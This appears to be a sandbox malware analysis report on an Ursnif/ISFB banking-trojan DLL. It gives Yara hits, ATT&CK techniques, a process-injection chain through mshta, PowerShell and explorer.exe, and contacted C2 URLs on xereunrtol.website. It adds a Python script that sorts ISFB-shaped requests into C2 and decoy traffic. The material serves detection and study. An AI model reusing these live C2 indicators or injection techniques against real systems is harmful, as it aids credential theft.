                      Source: Yara matchFile source: 00000000.00000003.534116872.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.533922988.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.534170711.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.545735398.0000000005648000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.545790657.0000000005648000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.678615660.0000000004348000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.534139791.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.678663993.0000000004348000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.679072196.0000000004348000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.678803157.0000000004348000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000027.00000000.762429648.00000000102CC000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.534181195.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.545843952.0000000005648000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.635415693.0000000005648000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.533885657.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.678996946.0000000004348000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.620987281.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.545818216.0000000005648000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.545905967.0000000005648000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.637594207.000000000544C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6424, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6388, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3352, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR
                      Source: Yara matchFile source: 0.2.loaddll32.exe.b00000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.4a794a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.96a309.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.13494a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.4a794a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.6aa309.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.13494a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.50394a0.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.50394a0.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.3020000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.2f7a309.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.2f7a309.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.96a309.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.69a309.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.69a309.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.6aa309.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e1a0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.300a309.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.2bd0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.300a309.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000003.475507356.0000000000960000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.821862720.0000000001349000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.488168081.0000000002F70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.750652443.0000000005039000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.524931430.0000000004A79000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.457623668.0000000003000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.456819132.0000000000690000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.491371934.00000000006A0000.00000040.00000001.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                      Valid Accounts | Windows Management Instrumentation2 | DLL Side-Loading1 | DLL Side-Loading1 | Obfuscated Files or Information1 | Credential API Hooking3 | System Time Discovery1 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer3 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                      Default Accounts | Native API1 | Boot or Logon Initialization Scripts | Process Injection813 | DLL Side-Loading1 | LSASS Memory | Account Discovery1 | Remote Desktop Protocol | Email Collection1 | Exfiltration Over Bluetooth | Encrypted Channel11 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                      Domain Accounts | Command and Scripting Interpreter1 | Logon Script (Windows) | Logon Script (Windows) | File Deletion1 | Security Account Manager | File and Directory Discovery3 | SMB/Windows Admin Shares | Credential API Hooking3 | Automated Exfiltration | Non-Application Layer Protocol3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                      Local Accounts | PowerShell1 | Logon Script (Mac) | Logon Script (Mac) | Rootkit4 | NTDS | System Information Discovery25 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol14 | SIM Card Swap | Carrier Billing Fraud |
                      Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Masquerading1 | LSA Secrets | Security Software Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
                      Replication Through Removable Media | Launchd | Rc.common | Rc.common | Virtualization/Sandbox Evasion21 | Cached Domain Credentials | Virtualization/Sandbox Evasion21 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
                      External Remote Services | Scheduled Task | Startup Items | Startup Items | Process Injection813 | DCSync | Process Discovery3 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
                      Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Rundll321 | Proc Filesystem | Application Window Discovery1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |
                      Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | System Owner/User Discovery1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction |
                      Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | Remote System Discovery11 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | Data Encrypted for Impact | |
                      Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Right-to-Left Override | Input Capture | System Network Configuration Discovery1 | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | Service Stop | |

                      Behavior Graph


                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      Behavior Graph ID: 499264   Sample: uT9rwkGATJ.dll   Startdate: 08/10/2021   Architecture: WINDOWS   Score: 100
                      Signatures attached to the sample node: Found malware configuration; Sigma detected: Powershell run code from registry; Yara detected Ursnif; 9 other signatures

                      Process tree as drawn in the graph (network contacts, dropped files and signatures are listed under the process they are attached to; the counts shown beside a process name in the graph are kept as-is):
                      mshta.exe 19 (started)
                        Suspicious powershell command line found
                        powershell.exe 30 (started)
                          dropped: C:\Users\user\AppData\...\uio4qdnj.cmdline, UTF-8
                          Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; Modifies the context of a thread in another process (thread injection)
                          explorer.exe (injected)
                            Changes memory attributes in foreign processes to executable or writable; Self deletion via cmd delete; Writes to foreign memory regions; 5 other signatures
                            cmd.exe (started)
                              Uses ping.exe to sleep; Uses ping.exe to check the status of other devices and networks
                              conhost.exe (started)
                              PING.EXE (started)
                            cmd.exe (started)
                              PING.EXE (started)
                                192.168.2.1 unknown unknown
                              conhost.exe (started)
                            RuntimeBroker.exe (injected)
                          csc.exe (started)
                            dropped: C:\Users\user\AppData\Local\...\uio4qdnj.dll, PE32
                            cvtres.exe (started)
                          csc.exe (started)
                            dropped: C:\Users\user\AppData\Local\...\hjljqxud.dll, PE32
                            cvtres.exe (started)
                          conhost.exe (started)
                      loaddll32.exe 1 1 (started)
                        outlook.com 40.97.156.114, 443, 49754 MICROSOFT-CORP-MSN-AS-BLOCKUS United States
                        HHN-efz.ms-acdc.office.com 52.97.151.18, 443, 49756 MICROSOFT-CORP-MSN-AS-BLOCKUS United States
                        7 other IPs or domains
                        Writes to foreign memory regions; Writes or reads registry keys via WMI; Writes registry values via WMI
                        cmd.exe 1 (started)
                          rundll32.exe (started)
                            40.101.9.178, 443, 49765 MICROSOFT-CORP-MSN-AS-BLOCKUS United States
                            40.97.160.2, 443, 49764 MICROSOFT-CORP-MSN-AS-BLOCKUS United States
                            10 other IPs or domains
                            System process connects to network (likely due to code injection or exploit)
                            control.exe (started)
                              rundll32.exe (started)
                        rundll32.exe (started)
                          System process connects to network (likely due to code injection or exploit); Writes registry values via WMI
                        control.exe (started)
                          rundll32.exe (started)
                        2 other processes
                      mshta.exe (started)
                        powershell.exe (started)
                          Maps a DLL or memory area into another process; Creates a thread in another existing process (thread injection)
                          csc.exe (started)
                            dropped: C:\Users\user\AppData\Local\...\hiiw3gsl.dll, PE32
                            cvtres.exe (started)
                          csc.exe (started)
                            dropped: C:\Users\user\AppData\Local\...\ebytp2em.dll, PE32
                            cvtres.exe (started)
                          conhost.exe (started)


                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

Source | Detection | Scanner | Label
uT9rwkGATJ.dll | 100% | Joe Sandbox ML | -

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

Source | Detection | Scanner | Label
0.2.loaddll32.exe.b00000.0.unpack | 100% | Avira | HEUR/AGEN.1108168
3.2.rundll32.exe.3020000.0.unpack | 100% | Avira | HEUR/AGEN.1108168
4.2.rundll32.exe.2bd0000.0.unpack | 100% | Avira | HEUR/AGEN.1108168

                      Domains

                      No Antivirus matches

                      URLs

Source | Detection | Scanner | Label
https://xereunrtol.website/pojol/Iy4aVVVv_2F5p3ISq/KmA4kE4MsjC2/O0neobTDOGW/zQHPZSL_2FkiUS/WZkQDHN_2BO0wsYuYQ60c/ykD9m58yrwFA_2Fc/7Q0DjKK2XYcw7wO/NMi_2BPmiK_2FGgoaB/sAJyJXEyx/kvg73rm0ZZUQwsWRe8jH/1VJfDP67eM6_2FlNyHx/2gb4jMnS4FBhM1k7othvDH/rOcbuo_2B/liSzQ.jop | 0% | Avira URL Cloud | safe
https://xereunrtol.website/pojol/W4QiDRChG_/2BVblDFptU_2BRt86/bDQ28Atm7UJp/hMrJ18dixaJ/Ehvso7jB6b1A7n/fuEtfFyRY6z_2FVw8s1t6/enfrMlaYNyygktry/YNTHSHxjijP0_2B/G7FZq6LMuf5Bf2R30l/ih28AE5GN/brwux6ZnrceibZm2b3Bl/W4v_2BEcLNfhDC9uqG8/mC3B1bUhAB/QJIQRA6ic/2.jop | 0% | Avira URL Cloud | safe
http://constitution.org/usdeclar.txt | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://xereunrtol.website/pojol/pfDJgBAB44HEkaaE/IAkYjQDoenC7dCc/knaeZ_2Bc4niJWZDoT/92La9yVP8/Nm_2F8vIouJQNUgCe_2B/Wv7KOG1Nz3mjOa0l_2F/OnBpy4GwhZX8qV0mLK2Wlc/FREIwqk_2Fjl_/2BOUAmEa/t8HTP1o0pL0qYjqL1hIxYFo/1EnpJwv2G5/SCJcrEDAQ0UY_2FXk/piB_2BjH/Biqze_2FNrj/O.jop | 0% | Avira URL Cloud | safe
http://constitution.org/usdeclar.txtC: | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
http://https://file://USER.ID%lu.exe/upd | 0% | Avira URL Cloud | safe
https://xereunrtol.website/pojol/ad8SMO3QEV/WpK2KWVlzISPCUWri/sHIqFx0L8nEL/d6DW60Wq7Sc/nktLUA8MXJku9L/Zmk6jUfJynHeMmB_2FY4b/Civyvu50LYW7nG6R/vXmd0MgFzqo2GgW/fQxwYw_2BGvLQBdwxJ/0lhkdnAJr/xh_2Fs6N3R0PcVVrZUsT/V_2FUDCTlH6Z32G0s2B/iaQ6r5gLvcevP7/0Gv8.jop | 0% | Avira URL Cloud | safe
https://xereunrtol.website/pojol/Erqz_2Bjz7wow49Bn/_2FYIkv6TVHF/sf1rwNiJ2Y3/yJrhJeNnU2kEjh/nuALEqJJJFMSq4HklSS5m/2rTPjjO5rg9u1lJM/jSBd70o6b_2FFTD/X_2BcSxW23GpW45bdz/qP6WaBi3l/T0VhC50JfgPQOKEf4_2B/z0gbHb1bA3R_2Bj9ls7/dy0ZwparSRsDS8LsskC3_2/FFWZkjDnU/Jgk.jop | 0% | Avira URL Cloud | safe

                      Domains and IPs

                      Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
outlook.com | 40.97.156.114 | true | false | - | high
HHN-efz.ms-acdc.office.com | 52.97.151.18 | true | false | - | high
FRA-efz.ms-acdc.office.com | 52.98.208.114 | true | false | - | high
xereunrtol.website | 193.29.104.83 | true | false | - | high
www.outlook.com | unknown | unknown | false | - | high
zereunrtol.website | unknown | unknown | false | - | high
outlook.office365.com | unknown | unknown | false | - | high

                                    Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
https://xereunrtol.website/pojol/Iy4aVVVv_2F5p3ISq/KmA4kE4MsjC2/O0neobTDOGW/zQHPZSL_2FkiUS/WZkQDHN_2BO0wsYuYQ60c/ykD9m58yrwFA_2Fc/7Q0DjKK2XYcw7wO/NMi_2BPmiK_2FGgoaB/sAJyJXEyx/kvg73rm0ZZUQwsWRe8jH/1VJfDP67eM6_2FlNyHx/2gb4jMnS4FBhM1k7othvDH/rOcbuo_2B/liSzQ.jop | true | Avira URL Cloud: safe | unknown
https://xereunrtol.website/pojol/W4QiDRChG_/2BVblDFptU_2BRt86/bDQ28Atm7UJp/hMrJ18dixaJ/Ehvso7jB6b1A7n/fuEtfFyRY6z_2FVw8s1t6/enfrMlaYNyygktry/YNTHSHxjijP0_2B/G7FZq6LMuf5Bf2R30l/ih28AE5GN/brwux6ZnrceibZm2b3Bl/W4v_2BEcLNfhDC9uqG8/mC3B1bUhAB/QJIQRA6ic/2.jop | true | Avira URL Cloud: safe | unknown
https://www.outlook.com/pojol/xkXyR8LKA/eI1evutWYClFQ4W7hwct/llxVsyUgZqM6TRxf7bd/2z3_2BxCgTSZ4eiQRk7_2B/xhR9ASIByVYd5/k9IZWWUd/sbd5P5Eg3X7dqsFpKCJyTDt/IAd_2BtulH/3wtBmsW6X6ginLnLB/VmVEduvxIp7D/zWV8_2BxG6O/L9p9ON1U8Ev0PL/rZEhbsLNtjIw0seImBfEo/iFBYVWe9s_2F7XNI/16GpD45T/z.jop | false | - | high
https://outlook.office365.com/pojol/tCbStZih9zBgw/PK5_2Fka/RdFSp7I7gIKF19Vo1xqIyOu/SHII9uTh4N/i16rSjNs5tk21XBNr/NN0e7MSF4abs/8Os7EFjy2AT/q_2FOByNu3Pktw/XcuCHxUTtQcQX6H9c5T92/Qi_2FpIg3IGciw_2/F7QY5uWmpwUhM_2/FrlZq3Dbrg_2F9dk41/aJHeuYWTN/Hb_2BgqqgGBMS_2FKc/A3Y.jop | false | - | high
https://xereunrtol.website/pojol/pfDJgBAB44HEkaaE/IAkYjQDoenC7dCc/knaeZ_2Bc4niJWZDoT/92La9yVP8/Nm_2F8vIouJQNUgCe_2B/Wv7KOG1Nz3mjOa0l_2F/OnBpy4GwhZX8qV0mLK2Wlc/FREIwqk_2Fjl_/2BOUAmEa/t8HTP1o0pL0qYjqL1hIxYFo/1EnpJwv2G5/SCJcrEDAQ0UY_2FXk/piB_2BjH/Biqze_2FNrj/O.jop | true | Avira URL Cloud: safe | unknown
https://outlook.com/pojol/xkXyR8LKA/eI1evutWYClFQ4W7hwct/llxVsyUgZqM6TRxf7bd/2z3_2BxCgTSZ4eiQRk7_2B/xhR9ASIByVYd5/k9IZWWUd/sbd5P5Eg3X7dqsFpKCJyTDt/IAd_2BtulH/3wtBmsW6X6ginLnLB/VmVEduvxIp7D/zWV8_2BxG6O/L9p9ON1U8Ev0PL/rZEhbsLNtjIw0seImBfEo/iFBYVWe9s_2F7XNI/16GpD45T/z.jop | false | - | high
https://outlook.com/pojol/tCbStZih9zBgw/PK5_2Fka/RdFSp7I7gIKF19Vo1xqIyOu/SHII9uTh4N/i16rSjNs5tk21XBNr/NN0e7MSF4abs/8Os7EFjy2AT/q_2FOByNu3Pktw/XcuCHxUTtQcQX6H9c5T92/Qi_2FpIg3IGciw_2/F7QY5uWmpwUhM_2/FrlZq3Dbrg_2F9dk41/aJHeuYWTN/Hb_2BgqqgGBMS_2FKc/A3Y.jop | false | - | high
https://xereunrtol.website/pojol/ad8SMO3QEV/WpK2KWVlzISPCUWri/sHIqFx0L8nEL/d6DW60Wq7Sc/nktLUA8MXJku9L/Zmk6jUfJynHeMmB_2FY4b/Civyvu50LYW7nG6R/vXmd0MgFzqo2GgW/fQxwYw_2BGvLQBdwxJ/0lhkdnAJr/xh_2Fs6N3R0PcVVrZUsT/V_2FUDCTlH6Z32G0s2B/iaQ6r5gLvcevP7/0Gv8.jop | true | Avira URL Cloud: safe | unknown
https://outlook.office365.com/pojol/xkXyR8LKA/eI1evutWYClFQ4W7hwct/llxVsyUgZqM6TRxf7bd/2z3_2BxCgTSZ4eiQRk7_2B/xhR9ASIByVYd5/k9IZWWUd/sbd5P5Eg3X7dqsFpKCJyTDt/IAd_2BtulH/3wtBmsW6X6ginLnLB/VmVEduvxIp7D/zWV8_2BxG6O/L9p9ON1U8Ev0PL/rZEhbsLNtjIw0seImBfEo/iFBYVWe9s_2F7XNI/16GpD45T/z.jop | false | - | high
https://xereunrtol.website/pojol/Erqz_2Bjz7wow49Bn/_2FYIkv6TVHF/sf1rwNiJ2Y3/yJrhJeNnU2kEjh/nuALEqJJJFMSq4HklSS5m/2rTPjjO5rg9u1lJM/jSBd70o6b_2FFTD/X_2BcSxW23GpW45bdz/qP6WaBi3l/T0VhC50JfgPQOKEf4_2B/z0gbHb1bA3R_2Bj9ls7/dy0ZwparSRsDS8LsskC3_2/FFWZkjDnU/Jgk.jop | true | Avira URL Cloud: safe | unknown
https://www.outlook.com/pojol/tCbStZih9zBgw/PK5_2Fka/RdFSp7I7gIKF19Vo1xqIyOu/SHII9uTh4N/i16rSjNs5tk21XBNr/NN0e7MSF4abs/8Os7EFjy2AT/q_2FOByNu3Pktw/XcuCHxUTtQcQX6H9c5T92/Qi_2FpIg3IGciw_2/F7QY5uWmpwUhM_2/FrlZq3Dbrg_2F9dk41/aJHeuYWTN/Hb_2BgqqgGBMS_2FKc/A3Y.jop | false | - | high
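
The requests to xereunrtol.website and to the Microsoft mail hosts in the table above have the same shape: a fixed first directory (pojol), a run of path segments built from base64 text in which the URL-encoded '/' and '+' appear as _2F and _2B (the percent sign replaced by an underscore), slashes inserted at arbitrary positions, and a short bogus file extension (.jop). That is how Ursnif/ISFB carries its encrypted request data, and the identical requests to outlook.com, www.outlook.com and outlook.office365.com are its connectivity check and decoy traffic, which is why only the path shape, not the domain, separates C2 from noise. The following is an added example written for this page, not code from the Joe Sandbox report: it scores each contacted URL against that shape and labels hosts. The URLs are copied from the table (a subset); the two plain URLs at the end are constructed negatives, and the list of hosts treated as well known is an assumption of the example.

```python
"""Classifying the report's contacted URLs by ISFB request shape.

Added example, not part of the Joe Sandbox report. URLS holds a subset of
the "Contacted URLs" table plus two constructed negatives. The host
allowlist is an assumption: the three Microsoft mail hosts the sample
also talks to.
"""
import re
from urllib.parse import urlsplit

URLS = [
    "https://xereunrtol.website/pojol/Iy4aVVVv_2F5p3ISq/KmA4kE4MsjC2/O0neobTDOGW/zQHPZSL_2FkiUS/WZkQDHN_2BO0wsYuYQ60c/ykD9m58yrwFA_2Fc/7Q0DjKK2XYcw7wO/NMi_2BPmiK_2FGgoaB/sAJyJXEyx/kvg73rm0ZZUQwsWRe8jH/1VJfDP67eM6_2FlNyHx/2gb4jMnS4FBhM1k7othvDH/rOcbuo_2B/liSzQ.jop",
    "https://xereunrtol.website/pojol/W4QiDRChG_/2BVblDFptU_2BRt86/bDQ28Atm7UJp/hMrJ18dixaJ/Ehvso7jB6b1A7n/fuEtfFyRY6z_2FVw8s1t6/enfrMlaYNyygktry/YNTHSHxjijP0_2B/G7FZq6LMuf5Bf2R30l/ih28AE5GN/brwux6ZnrceibZm2b3Bl/W4v_2BEcLNfhDC9uqG8/mC3B1bUhAB/QJIQRA6ic/2.jop",
    "https://xereunrtol.website/pojol/pfDJgBAB44HEkaaE/IAkYjQDoenC7dCc/knaeZ_2Bc4niJWZDoT/92La9yVP8/Nm_2F8vIouJQNUgCe_2B/Wv7KOG1Nz3mjOa0l_2F/OnBpy4GwhZX8qV0mLK2Wlc/FREIwqk_2Fjl_/2BOUAmEa/t8HTP1o0pL0qYjqL1hIxYFo/1EnpJwv2G5/SCJcrEDAQ0UY_2FXk/piB_2BjH/Biqze_2FNrj/O.jop",
    "https://xereunrtol.website/pojol/ad8SMO3QEV/WpK2KWVlzISPCUWri/sHIqFx0L8nEL/d6DW60Wq7Sc/nktLUA8MXJku9L/Zmk6jUfJynHeMmB_2FY4b/Civyvu50LYW7nG6R/vXmd0MgFzqo2GgW/fQxwYw_2BGvLQBdwxJ/0lhkdnAJr/xh_2Fs6N3R0PcVVrZUsT/V_2FUDCTlH6Z32G0s2B/iaQ6r5gLvcevP7/0Gv8.jop",
    "https://xereunrtol.website/pojol/Erqz_2Bjz7wow49Bn/_2FYIkv6TVHF/sf1rwNiJ2Y3/yJrhJeNnU2kEjh/nuALEqJJJFMSq4HklSS5m/2rTPjjO5rg9u1lJM/jSBd70o6b_2FFTD/X_2BcSxW23GpW45bdz/qP6WaBi3l/T0VhC50JfgPQOKEf4_2B/z0gbHb1bA3R_2Bj9ls7/dy0ZwparSRsDS8LsskC3_2/FFWZkjDnU/Jgk.jop",
    "https://www.outlook.com/pojol/xkXyR8LKA/eI1evutWYClFQ4W7hwct/llxVsyUgZqM6TRxf7bd/2z3_2BxCgTSZ4eiQRk7_2B/xhR9ASIByVYd5/k9IZWWUd/sbd5P5Eg3X7dqsFpKCJyTDt/IAd_2BtulH/3wtBmsW6X6ginLnLB/VmVEduvxIp7D/zWV8_2BxG6O/L9p9ON1U8Ev0PL/rZEhbsLNtjIw0seImBfEo/iFBYVWe9s_2F7XNI/16GpD45T/z.jop",
    "https://outlook.office365.com/pojol/tCbStZih9zBgw/PK5_2Fka/RdFSp7I7gIKF19Vo1xqIyOu/SHII9uTh4N/i16rSjNs5tk21XBNr/NN0e7MSF4abs/8Os7EFjy2AT/q_2FOByNu3Pktw/XcuCHxUTtQcQX6H9c5T92/Qi_2FpIg3IGciw_2/F7QY5uWmpwUhM_2/FrlZq3Dbrg_2F9dk41/aJHeuYWTN/Hb_2BgqqgGBMS_2FKc/A3Y.jop",
    "https://outlook.com/pojol/xkXyR8LKA/eI1evutWYClFQ4W7hwct/llxVsyUgZqM6TRxf7bd/2z3_2BxCgTSZ4eiQRk7_2B/xhR9ASIByVYd5/k9IZWWUd/sbd5P5Eg3X7dqsFpKCJyTDt/IAd_2BtulH/3wtBmsW6X6ginLnLB/VmVEduvxIp7D/zWV8_2BxG6O/L9p9ON1U8Ev0PL/rZEhbsLNtjIw0seImBfEo/iFBYVWe9s_2F7XNI/16GpD45T/z.jop",
    # Constructed negatives: ordinary URLs that must not match.
    "https://www.apache.org/licenses/LICENSE-2.0.html",
    "https://nuget.org/nuget.exe",
]

# Assumption of this example: well-known hosts the sample also contacts with
# ISFB-shaped requests; those are treated as connectivity check / decoy traffic.
KNOWN_GOOD_HOSTS = {"outlook.com", "www.outlook.com", "outlook.office365.com"}

_SEGMENT = re.compile(r"^[A-Za-z0-9_]+$")   # base64 with '/'->_2F and '+'->_2B


def is_isfb_shaped(url: str) -> bool:
    """True if the path looks like an ISFB request: a first directory, then
    several alnum/underscore segments carrying _2F/_2B tokens (100+ chars in
    total, so base64 of an encrypted blob rather than a short slug), ending
    in a name with a short alphabetic extension."""
    parts = [p for p in urlsplit(url).path.split("/") if p]
    if len(parts) < 4:
        return False
    head, tail = parts[1:-1], parts[-1]
    stem, dot, ext = tail.rpartition(".")
    if not dot or not stem or not (2 <= len(ext) <= 4 and ext.isalpha()):
        return False
    if not all(_SEGMENT.match(s) for s in head + [stem]):
        return False
    # Joining the segments undoes the random slash insertion, so a token
    # split across a slash (e.g. "W4QiDRChG_/2BVbl") is still recognised.
    body = "".join(head + [stem])
    return len(body) >= 100 and ("_2F" in body or "_2B" in body)


def classify(urls):
    """Count ISFB-shaped requests per host and label each host."""
    counts = {}
    for u in urls:
        if is_isfb_shaped(u):
            host = urlsplit(u).hostname.lower()
            counts[host] = counts.get(host, 0) + 1
    verdicts = {}
    for host, n in counts.items():
        if host in KNOWN_GOOD_HOSTS:
            verdicts[host] = f"decoy/connectivity check ({n} ISFB-shaped requests to a well-known host)"
        else:
            verdicts[host] = f"likely C2 ({n} ISFB-shaped requests)"
    return verdicts


if __name__ == "__main__":
    for host, verdict in classify(URLS).items():
        print(f"{host:28s} {verdict}")
```

The classifier deliberately ignores the first directory and the extension value: pojol and .jop are per-campaign constants and change between builds, while the _2F/_2B encoding and the long alnum/underscore body are properties of how the bot encodes its payload.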

                                                URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000017.00000002.811226428.0000026CB6371000.00000004.00000001.sdmp, powershell.exe, 0000001B.00000002.815218185.0000029710062000.00000004.00000001.sdmp | false | - | high
http://constitution.org/usdeclar.txt | loaddll32.exe, 00000000.00000003.678884329.0000000004348000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.689152229.0000000006448000.00000004.00000040.sdmp, explorer.exe, 00000027.00000000.762429648.00000000102CC000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000031.00000002.822485950.000001B91FF02000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000001B.00000002.771001840.0000029700209000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000001B.00000002.771001840.0000029700209000.00000004.00000001.sdmp | false | - | high
https://contoso.com/ | powershell.exe, 0000001B.00000002.815218185.0000029710062000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000017.00000002.811226428.0000026CB6371000.00000004.00000001.sdmp, powershell.exe, 0000001B.00000002.815218185.0000029710062000.00000004.00000001.sdmp | false | - | high
http://constitution.org/usdeclar.txtC: | loaddll32.exe, 00000000.00000003.678884329.0000000004348000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.689152229.0000000006448000.00000004.00000040.sdmp, explorer.exe, 00000027.00000000.762429648.00000000102CC000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000031.00000002.822485950.000001B91FF02000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 0000001B.00000002.815218185.0000029710062000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
